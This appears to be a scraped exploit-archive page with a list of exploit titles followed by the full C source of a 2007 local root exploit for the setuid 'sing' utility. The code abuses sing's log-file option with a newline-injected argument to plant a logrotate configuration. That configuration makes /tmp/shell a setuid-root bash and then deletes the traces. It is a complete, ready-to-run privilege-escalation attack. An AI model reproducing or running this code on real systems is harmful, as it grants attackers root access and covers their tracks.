477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
58 lines
1.5 KiB
C
Executable file
58 lines
1.5 KiB
C
Executable file
/*
|
|
sing file append exploit
|
|
by bannedit
|
|
|
|
12/05/2007
|
|
|
|
The original reporter of this issue included an example session which
|
|
added an account to the machine.
|
|
|
|
The method for this exploit is slightly different and much more
|
|
quiet. Although it relies upon logrotate for help.
|
|
|
|
This could easily be modified to work with cron daemons which
|
|
are not too strict about the cron file format. However,
|
|
when I tested vixie cron it appears that there are
|
|
better checks for file format compilance these days.
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <unistd.h>
|
|
|
|
#define SING_PATH "/usr/bin/sing"
|
|
|
|
char *file = "/etc/logrotate.d/sing";
|
|
char *evilname = "\n/tmp/sing {\n daily\n size=0\n firstaction\n chown root /tmp/shell; chmod 4755 /tmp/shell; rm -f /etc/logrotate.d/sing; rm -f /tmp/sing*\n endscript\n}\n\n\n";
|
|
|
|
|
|
|
|
int main()
|
|
{
|
|
FILE *fp;
|
|
int pid;
|
|
|
|
puts("sing file append exploit");
|
|
puts("------------------------");
|
|
puts("by bannedit");
|
|
|
|
if(fp = fopen("/tmp/shell", "w+"))
|
|
{
|
|
fputs("#!/bin/bash\n", fp);
|
|
fputs("/bin/bash -p", fp);
|
|
fclose(fp);
|
|
system("touch /tmp/sing; echo garbage >> /tmp/sing");
|
|
}
|
|
else
|
|
{
|
|
puts("error making shell file");
|
|
exit(-1);
|
|
}
|
|
|
|
sleep(5);
|
|
printf("done sleeping...\n");
|
|
execl(SING_PATH, evilname, "-Q", "-c", "1", "-L", file, "localhost", 0);
|
|
return 0;
|
|
}
|
|
|
|
// milw0rm.com [2007-12-06]
|